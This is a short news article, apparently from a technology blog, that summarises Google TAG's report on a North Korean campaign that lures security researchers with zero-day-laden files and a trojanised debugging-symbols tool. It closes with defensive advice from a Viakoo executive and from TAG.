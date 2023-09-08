Lub neej hauv nroog

Unveiling New Technologies and the Power of AI

ByMampho Brescia

Sep 8, 2023
North Korean Cyber ​​Campaign Targets Security Researchers, Exploits Zero-Day Vulnerability

Google’s Threat Analysis Group (TAG) has revealed details about a cyber campaign originating from North Korea that specifically targets security researchers. The campaign, which has been monitored since January 2021, involves multiple attacks and the exploitation of at least one zero-day vulnerability. While Google has not disclosed the specifics of the vulnerability and the affected software, the company has reported the issue to the vendor, who is currently working on a patch.

In these attacks, the threat actors establish communication with security researchers through social media platforms before moving on to encrypted messaging apps. Once trust is established, the attackers distribute malicious files containing zero-day vulnerabilities in widely used software packages. When successfully exploited, the malicious code conducts anti-virtual machine checks and transmits collected data to a command-and-control domain controlled by the attackers.

According to John Gallagher, Vice President of Viakoo Labs at Viakoo, it is challenging to monitor and deeply investigate all interactions in the world of security research, which often relies on relationships formed over the internet. He advises organizations to adopt a “no exceptions” policy when handling software or links from outside their organization.

Apart from zero-day exploitation, the threat actors have also developed a Windows tool that downloads debugging symbols from major symbol servers, including those of Microsoft, Google, Mozilla, and Citrix. This seemingly legitimate tool can execute arbitrary code from attacker-controlled domains, potentially compromising victims’ systems.

The targeting of security researchers by nation-state actors like North Korea and Russia has become more frequent and sophisticated over the years. These operations aim to not only steal information but also gain insights into defense mechanisms, refine tactics, and evade future detection.

To mitigate these threats, TAG advises individuals who may have downloaded or run the tool to take precautions, including considering a system reinstall.

Source: Google Threat Analysis Group (TAG)

